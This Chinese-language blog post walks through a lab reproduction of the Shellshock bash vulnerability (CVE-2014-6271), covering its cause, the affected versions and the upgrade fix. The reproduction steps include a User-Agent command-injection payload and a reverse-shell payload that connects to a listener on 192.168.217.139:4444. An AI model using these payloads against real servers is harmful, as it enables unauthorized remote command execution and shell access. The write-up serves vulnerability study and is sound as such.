漏洞简介

破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露。许多面向互联网的服务,如一些网络服务器部署,使用bash来处理某些请求,允许攻击者导致脆弱的bash版本执行任意命令。这可以让攻击者获得对计算机系统的未授权访问。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行

漏洞成因

bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。

漏洞范围

bash版本小于等于4.3

漏洞复现

1、打开漏洞地址

2、成功正常访问,打开bp进行抓包(同时抓取两个数据包payload)

3、将payload附在User-Agent中,并发送请求

User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

4、可以看到成功执行了命令,以同样的数据在safe.cgi发送请求,发现其不受影响

5、kali开启端口监听,执行反弹shell命令

() { :;}; echo;/bin/bash -i >& /dev/tcp/192.168.217.139/4444 0>&1

6、成功反弹shell

漏洞修复

将bash版本升级到最新版本

bash(CVE-2014-6271) shellshock-破壳漏洞复现相关推荐

  1. Shellshock 破壳漏洞(CVE-2014-6271)

    漏洞简介 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义.远程攻击者可借助特制的环境变量利用该漏洞执行任意代码. 漏洞复现 将payload附在Us ...

  2. vulhub漏洞复现之bash(Shellshock CVE-2014-6271)

    Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此 ...

  3. Shellshock(bashdoor)漏洞详细分析、复现

    一.Shellshock的背景 Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开.许多互联网守护进程,如网页服务 ...

  4. CVE-2022-30190 MSDT远程代码执行漏洞复现

    目录 0x01 声明: 0x02 简介: 0x03 漏洞概述: 0x04 影响版本: 0x05 环境搭建: 0x06 漏洞复现: 是否存在利用点: CMD执行: 生成docx文件利用: 0x07 CS ...

  5. Linux Bash漏洞复现

    Bash是什么? Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实现,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系 ...

  6. vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞

    漏洞简介 破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露.许多面向互联网的服务,如一些网络服 ...

  7. 【web攻防】破壳漏洞【CVE-2014-6271】与心脏滴血漏洞 【CVE-2014-0160】 docker 复现 学习过程

    其实最近的确是想更新一些文章的,但一直在忙于挖洞和挖洞技巧学习,前者肯定不能发真实案例,后者学的太零碎太杂,自己也处于一个积累的过程,发一些边边角角的内容也没意思. 虽然相比以前的确有了一点进步,但我 ...

  8. 修复linux bash破壳漏洞,Linux系统下如何检测并修复bash中的破壳漏洞​​

    问题:我想要知道我的Linux服务器是否存在bash破壳漏洞,以及如何来保护我的Linux服务器不受破壳漏洞侵袭. 2014年9月24日,一位名叫斯特凡·沙泽拉的安全研究者发现了一个名为"破 ...

  9. 修复linux bash破壳漏洞,Linux下bash破壳漏洞检测及修复的方法

    如果Linux服务器存在bash破壳漏洞,将可能导致远程攻击者操作系统来执行任意命令,威胁等级较高,我想要知道我的Linux服务器是否存在bash破壳漏洞,以及如何来保护我的Linux服务器不受破壳漏 ...

最新文章

  1. 杨学海:跨境电商新通道-进口保税直邮模式解析
  2. 使用javaHelp制作java swing帮助文档
  3. Linq to XML
  4. dataframe常用操作_【Data Mining】机器学习三剑客之Pandas常用算法总结上
  5. JavaWeb:CSS层叠样式表
  6. python3(十)pickle库
  7. .bash_profile vs .bashrc
  8. [SAP FI] Bank Master Vendor Master Creation Related Knowledge
  9. ldconfig和ldd用法
  10. android如何用代码实现界面ui
  11. 《程序是怎样跑起来的》第六章有感
  12. wireshark分析UDP数据包
  13. Window10环境下安装VMware12
  14. html文件怎么用华为手机打开,如何调整华为手机中的文件默认打开方式
  15. 同时使用SVN和Git进行版本控制
  16. python分发扑克牌_python模拟实现分发扑克牌
  17. DDR VTT供电解决方案
  18. SHA1WithRSA签名使用openssl 实现
  19. 计算机网络分层汇聚层,大型局域网通常划分为核心层、汇聚层和接入层,以下关于各个网络层次的描述中,不 - 问答库...
  20. python调用函数示例_Python使用execjs运行JS函数示例,python,execJS,例子

热门文章

  1. 广告中的DSP、SSP和ADX
  2. 以周一为每周的第一天,计算周数
  3. python3d旋转相册_3D立体相册,一个可旋转的立体相册
  4. oracle Day1
  5. java 中long型数据的对比
  6. Visual Studio 版本号及其各个版本对应关系
  7. google map api key申请
  8. 切片(Slice)在python中的运用(:)
  9. 霍尔传感器及其在BLDC电机上的应用
  10. 看完,你就理解什么是数据的全量、增量、差异备份了